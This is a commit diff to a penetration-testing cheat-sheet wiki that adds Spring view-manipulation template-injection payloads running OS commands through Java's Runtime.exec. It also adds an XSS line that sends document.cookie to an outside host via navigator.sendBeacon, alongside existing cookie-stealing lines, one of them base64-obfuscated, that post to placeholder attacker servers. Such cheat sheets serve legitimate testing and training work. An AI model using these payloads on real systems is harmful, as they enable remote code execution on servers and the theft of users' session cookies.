GitBook: [master] 2 pages modified
This commit is contained in:
parent
922db0f156
commit
85571317f2
@ -151,6 +151,13 @@ http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
|
||||
|
||||
* [https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/](https://www.acunetix.com/blog/web-security-zone/exploiting-ssti-in-thymeleaf/)
|
||||
|
||||
### Spring View Manipulation \(Java\)
|
||||
|
||||
* `__${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("id").getInputStream()).next()}__::.x`
|
||||
* `__${T(java.lang.Runtime).getRuntime().exec("touch executed")}__::.x`
|
||||
|
||||
[https://github.com/veracode-research/spring-view-manipulation](https://github.com/veracode-research/spring-view-manipulation)
|
||||
|
||||
### Smarty \(PHP\)
|
||||
|
||||
#### More information
|
||||
|
@ -522,6 +522,7 @@ A XSS occurs.
|
||||
<script>var xhttp=new XMLHttpRequest();xhttp.open("GET", "http://<SERVER_IP>/?c="%2Bdocument.cookie, true);xhttp.send();</script>
|
||||
<script>eval(atob('ZG9jdW1lbnQud3JpdGUoIjxpbWcgc3JjPSdodHRwczovLzxTRVJWRVJfSVA+P2M9IisgZG9jdW1lbnQuY29va2llICsiJyAvPiIp'));</script>
|
||||
<script>fetch('https://YOUR-SUBDOMAIN-HERE.burpcollaborator.net', {method: 'POST', mode: 'no-cors', body:document.cookie});</script>
|
||||
<script>navigator.sendBeacon('https://ssrftest.com/x/AAAAA',document.cookie)</script>
|
||||
```
|
||||
|
||||
### Port Scanner \(fetch\)
|
||||
|
Loading…
Reference in New Issue
Block a user